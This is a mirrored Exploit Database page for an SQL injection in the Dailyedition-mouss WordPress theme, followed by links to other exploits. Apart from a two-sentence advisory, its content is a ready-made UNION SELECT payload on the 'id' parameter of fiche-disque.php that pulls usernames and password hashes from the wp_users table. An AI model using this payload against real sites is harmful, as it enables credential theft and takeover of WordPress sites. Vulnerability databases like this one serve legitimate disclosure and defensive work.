WordPress Theme Dailyedition-mouss – ‘id’ SQL Injection

Exploit Database
14 阅读

作者： Ashiyane Digital Security Team

日期： 2012-11-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38022/

source: https://www.securityfocus.com/bid/56568/info

The Dailyedition-mouss theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users--

last Exploits
WordPress Theme Dailyedition-mouss – ‘id’ SQL Injection的更多信息

Joomla! Component com_event – Multiple Vulnerabilities：
Escortservice 1.0 – ‘custid’ SQL Injection：
VehicleWorkshop – Authentication Bypass：
ChillyCMS – Blind SQL Injection：
NetGain Enterprise Manager 7.2.562 – ‘Ping’ Command Injection：
Carel pCOWeb < B1.2.1 - Cross-Site Scripting：
AVTECH IP Camera / NVR / DVR Devices – Multiple Vulnerabilities：
WordPress Plugin Spellchecker 3.1 – ‘/general.php’ Local/Remote File Inclusion：